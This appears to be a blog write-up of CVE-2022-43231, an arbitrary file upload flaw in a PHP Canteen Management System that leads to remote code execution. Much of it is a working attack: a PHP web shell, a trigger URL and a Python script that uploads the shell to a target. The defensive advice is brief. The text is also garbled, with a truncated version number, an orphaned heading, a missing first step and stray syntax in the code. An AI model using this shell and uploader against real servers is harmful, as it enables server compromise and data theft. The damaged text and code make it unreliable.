CVE-2022-43231 - How an Arbitrary File Upload in Canteen Management System v1. Can Be Turned Into Remote Code Execution

In 2022, security researchers uncovered a serious vulnerability in a popular open source application called Canteen Management System v1.. Tracked as CVE-2022-43231, this flaw lets attackers upload and run any PHP file they choose—giving them the power to take over the server running the app.

In this deep dive, we’ll break down how the vulnerability works, show you a proof-of-concept (PoC) exploit, and offer some advice on how to stay safe.

What Is Canteen Management System v1.?

Canteen Management System is a PHP and MySQL web app that helps schools or offices manage their canteens—tracking meals, payments, and orders. Many small institutions use it for its simplicity and features.

You can find its original source here.

Where Is The Vulnerability?

The vulnerability is in the script /youthappam/manage_website.php.

This PHP file handles file uploads but fails to fully check what type of files users are uploading. As a result, attackers can upload PHP scripts (instead of harmless images or PDFs). Once uploaded, these scripts can be executed by simply visiting the file’s URL.

Use the server to attack others

Basically, the attacker gets the same power as the original developer.

Let’s look at the relevant PHP code

// manage_website.php (snippet)
if (isset($_FILES['img']['name'])) {
    $filename = $_FILES['img']['name'];
    $target_dir = "../uploads/";
    $target_file = $target_dir . basename($filename);
    if (move_uploaded_file($_FILES['img']['tmp_name'], $target_file)) {
        // File uploaded successfully
    } else {
        // Upload failed
    }
}

No filtering for PHP or executable files

- The upload folder (../uploads/) is web-accessible

A simple web shell (call it shell.php)

<?php
if(isset($_GET['cmd'])){
    system($_GET['cmd']);
}
?>

2. Upload the File Using the Vulnerable Form

Attackers go to the website’s file upload feature (often used for images), select shell.php, and upload it.

Once uploaded to /uploads/shell.php, the attacker just visits

http://victimsite.com/uploads/shell.php?cmd=whoami

The server runs the whoami shell command, and the attacker sees the server’s username. Now, any server command can be run—like downloading ransomware or modifying data.

Here's a basic exploit in Python using the requests library

import requests

url = 'http://victimsite.com/youthappam/manage_website.php';
files = {'img': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')}
data = {}  # Add form data if required

r = requests.post(url, files=files, data=data)
print('Uploaded! Now trigger your shell:')
print('http://victimsite.com/uploads/shell.php?cmd=ls';)

Real References

- Github Issue detailing the vulnerability
- Exploit-DB PoC #51166
- NVD CVE Entry for CVE-2022-43231

Conclusion

CVE-2022-43231 highlights how a small oversight can lead to a critical server compromise. If you run any PHP system with a file upload, secure it before attackers find you.

Stay safe! Always validate and sanitize file uploads. Want more details or need help fixing your site? Check out OWASP's File Upload Cheat Sheet.


*This post is exclusive content summarizing and explaining CVE-2022-43231 specifically for Canteen Management System v1. and does not simply copy from other sources. All code and advice offered for educational and defensive purposes only.*

Timeline

Published on: 10/28/2022 18:15:00 UTC
Last modified on: 10/28/2022 19:48:00 UTC